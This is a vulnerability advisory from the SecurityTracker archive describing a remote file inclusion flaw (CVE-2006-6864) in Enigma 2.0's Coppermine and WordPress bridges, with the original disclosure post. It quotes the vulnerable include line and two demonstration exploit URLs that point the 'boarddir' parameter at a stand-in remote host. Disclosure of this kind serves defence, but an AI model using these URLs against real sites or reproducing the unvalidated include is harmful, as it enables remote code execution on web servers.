SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Forum/Board/Portal)  >   Enigma Vendors:   Lunabyte Systems
Enigma Include File Bug in Coppermine and WordPress Bridges Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1017459
SecurityTracker URL:  http://securitytracker.com/id/1017459
CVE Reference:   CVE-2006-6864   (Links to External Site)
Updated:  May 20 2008
Original Entry Date:  Dec 31 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 2.0
Description:   A vulnerability was reported in Enigma in the Coppermine Bridge and the WordPress Bridge. A remote user can include and execute arbitrary code on the target system.

In the Coppermine Bridge, the 'E2_header.inc.php' script does not properly validate user-supplied input in the 'boarddir' parameter.

In the WordPress Bridge, the 'Enigma2.php' script does not properly validate user-supplied input in the 'boarddir' parameter.

A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

Some demonstration exploit URLs are provided:

/bridge/enigma/E2_header.inc.php?boarddir=http://evil_scripts?
WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=http://evil_scripts?

xoron reported this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.lunabyte.org/index.php?module=Downloads;catd=4 (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Date:  30 Dec 2006 20:20:10 -0000
Subject:  Enigma Coppermine Bridge (boarddir) Remote File Include

-----------------------------------------------

Enigma Coppermine Bridge (boarddir) Remote File Include

-----------------------------------------------


Author: xoron

-----------------------------------------------
 
Vuln Code:

require_once($boarddir . '/PortalSources/Portal.ini.php');

-----------------------------------------------

3xplo!t:

/bridge/enigma/E2_header.inc.php?boarddir=http://evil_scripts?

-----------------------------------------------

download:  http://www.lunabyte.org/index.php?PHPSESSID=376bd47985f6c37b06ceb727b0879287&module=Downloads;sa=dlview;id=7

-----------------------------------------------
XORON   -   XORON   -   XORON   -   XORON   -   XORON
-----------------------------------------------------------
-                                                         -
-                                                         -
- Tum muslumanlarin kurban bayrami simdiden mubarek olsun -
-                                                         -
-              Greetz: str0ke, Kacper                     -
-                                                         -
-----------------------------------------------------------

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC